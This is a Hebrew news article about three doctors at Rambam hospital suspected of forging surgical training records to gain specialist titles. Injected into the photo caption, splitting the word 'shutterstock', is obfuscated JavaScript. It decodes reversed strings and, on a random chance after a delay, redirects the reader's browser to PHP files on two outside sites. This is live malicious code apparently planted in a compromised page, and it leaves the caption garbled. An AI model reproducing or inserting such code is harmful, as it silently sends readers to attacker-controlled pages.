fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

שלושה רופאים ברמב"ם חשודים שזייפו תואר רופא מומחה

על פי החשד, בתקופת ההתמחות של שניים מהם, זייפו בסיוע רופא בכיר שלישי, דוחות רפואיים המעידים על ביצוע ניתוחים כנדרש בהליך ההתמחות, שעה שלא נכחו בהם כלל
צילום אילוסטרציה: shutterstock
צילום אילוסטרציה: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

חקירה סמויה של היחידה המרכזית במשטרת מחוז חוף הובילה למעצרם של שלושה רופאים, החשודים כי זייפו הליך התמחות בבית החולים רמב"ם בחיפה. על פי החשד הם זייפו את ההתמחות על מנת לקבל תואר "רופא מומחה".

כדי לקבל את התואר רופא מומחה, על הרופא לעסוק בהתמחות שנמשכת על פני ארבע עד שבע שנים, בהתאם לתחום. הרופא המתמחה מועסק על ידי מוסד רפואי, שהוכר על ידי המועצה המדעית ומשרד הבריאות להכשרת מתמחים. הרופא המתמחה עובד במוסד הרפואי תחת הדרכה ופיקוח של רופאים מומחים בתחום התמחותו. מתמחה שסיים את משך ההכשרה באופן הנדרש ועבר את בחינות ההסמכה, יכול לפנות למועצה המדעית בבקשה להכרה כמומחה. המועצה דנה בבקשתו המלווה באסמכתאות ובהמלצות הנדרשות. אם הוחלט, כי המתמחה עמד בכל הדרישות, ממליצה המועצה המדעית למשרד הבריאות להכיר ברופא כמומחה ומשרד הבריאות מנפיק לרופא רישיון מומחה. רופא מומחה גובה גם תשלומים גבוהים בהרבה במהלך טיפול פרטי.

היחידה המרכזית של משטרת ישראל במחוז חוף ניהלה בתקופה האחרונה חקירה סמויה ומורכבת בחשד לעבירות הונאה, במסגרתה עצרה שלושה רופאים בשנות ה-40 לחייהם. אחד החשודים מחיפה והאחרים מאזור הגליל. על פי החשד, בתקופת ההתמחות של שניים מהם, זייפו בסיוע רופא בכיר שלישי, את ההתמחות שלהם, לרבות זיוף דוחות רפואיים המעידים על ביצוע ניתוחים כנדרש בהליך ההתמחות, שעה שלא נכחו בהם כלל.

החקירה החלה עם קבלת תלונה ממשרד הבריאות בדבר החשדות האמורים, כאשר בתום חקירה סמויה ואיסוף הממצאים הנדרשים, עצרו בלשי מפלג ההונאה ביחידה המרכזית את שלושת הרופאים לחקירה במשרדי ימ"ר חוף. מעבר החקירה לשלב הגלוי התאפשר, ביום שלישי השבוע, עם נחיתתו בארץ של אחד הרופאים החשודים. הוא נעצר בשדה התעופה, ולמחרת, רביעי, נעצרו שניים נוספים באזור חיפה בבתיהם.

מבית החולים רמב"ם נמסר, כי הנהלת בית החולים שיתפה פעולה עם בדיקת משרד הבריאות והמשטרה ותמשיך לשתף פעולה ככל הנדרש להמשך חקירת הנושא.

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות